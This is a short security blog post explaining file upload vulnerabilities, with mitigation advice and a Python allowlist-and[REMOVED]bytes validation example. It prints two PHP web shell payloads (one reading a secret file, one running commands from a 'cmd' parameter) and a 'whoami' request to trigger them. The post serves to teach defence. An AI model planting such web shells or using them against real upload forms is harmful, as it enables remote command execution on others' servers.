File Upload Vulnerabilities

golam_mostafa

Posted on November 23, 2024

What Are File Upload Vulnerabilities?

File upload vulnerabilities occur when a server lets users upload files without proper checks. Attackers can exploit this to upload harmful files, like scripts, instead of safe ones, like images. Sometimes, just uploading the file causes damage; other times, attackers trigger the file to execute with a request.


How Do These Vulnerabilities Happen?

Even when protections exist, flaws in implementation can still allow attacks. Common issues include:

  • Blocking some dangerous file types but missing others.
  • Relying on file properties that attackers can fake using tools.
  • Inconsistent validation across the website.

These small mistakes give attackers ways to bypass security measures.


Exploiting Flawed File Upload Validation

Attackers often exploit weak validation to upload harmful scripts, like web shells. For example, a PHP script like this reads secret files:

<?php echo file_get_contents('secret.txt'); ?>

Or, a script like this can run system commands:

<?php echo system($_GET['cmd']); ?>

Attackers can send:

GET /hack.php?cmd=whoami

This returns the name of the account the web server process runs as, and it confirms that the attacker can run commands on the server.


Flawed File Type Validation

Some servers validate file uploads by checking the Content-Type header for expected MIME types like image/jpeg. However, if the server trusts this header without checking the file's actual contents, attackers can easily bypass the validation.

For example, an image upload form may send this request:

POST /images HTTP/1.1  
Host: example.com  
Content-Type: multipart/form-data; boundary=boundary

--boundary  
Content-Disposition: form-data; name="image"; filename="example.jpg"  
Content-Type: image/jpeg  

[binary data]  
--boundary--

If the server only verifies the Content-Type value, attackers can fake this using tools like Burp Repeater and upload malicious files disguised as images.


Protecting Against File Upload Vulnerabilities

To prevent these attacks:

  1. Verify file content matches the declared type.
  2. Store uploaded files in non-executable directories.
  3. Use strict whitelists for allowed file types.
  4. Scan files for malicious content.
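
As an added example (not code from the original post), steps 1 and 3 can be combined in one server-side check, shown here in Python: the extension must be on an allowlist, and the file's leading bytes must match it regardless of the Content-Type the client sent. The function names, the allowlist contents and the sample uploads are assumptions made for illustration.

```python
import os
import secrets

# Allowlist: extension -> (expected MIME type, accepted leading magic bytes).
ALLOWED = {
    ".jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    ".png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    ".gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}

class UploadRejected(ValueError):
    """Raised when an upload fails any allowlist check."""

def validate_upload(filename: str, declared_type: str, data: bytes) -> str:
    """Return a server-generated storage name or raise UploadRejected.

    filename and declared_type come from the multipart part headers, so the
    client controls both; data is the part body.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected("extension not on allowlist")
    mime, magics = ALLOWED[ext]
    # The declared type must agree with the extension...
    if declared_type.split(";")[0].strip().lower() != mime:
        raise UploadRejected("declared type does not match extension")
    # ...and the bytes must agree with both, whatever the headers claim.
    if not data.startswith(magics):
        raise UploadRejected("content does not match declared type")
    # Never reuse the client's name; store under a random one.
    return secrets.token_hex(16) + ext

# Constructed sample uploads (not from the original post): a real JPEG header,
# then script text sent under two different names with a faked Content-Type.
SAMPLES = [
    ("example.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"),
    ("hack.php", "image/jpeg", b"<?php /* placeholder */ ?>"),
    ("hack.jpg", "image/jpeg", b"<?php /* placeholder */ ?>"),
]

def check(name: str, ctype: str, body: bytes) -> str:
    try:
        return "accepted as " + validate_upload(name, ctype, body)
    except UploadRejected as exc:
        return "rejected: " + str(exc)

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[0], "->", check(*sample))
```

A leading-bytes check does not stop a file that begins with valid image bytes and carries script text further in, which is why step 2 (a non-executable storage directory) is still needed alongside it.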

Learn More: Watch the Tutorial

Acknowledgment: This post is inspired by insights from PortSwigger Web Security and ChatGPT.
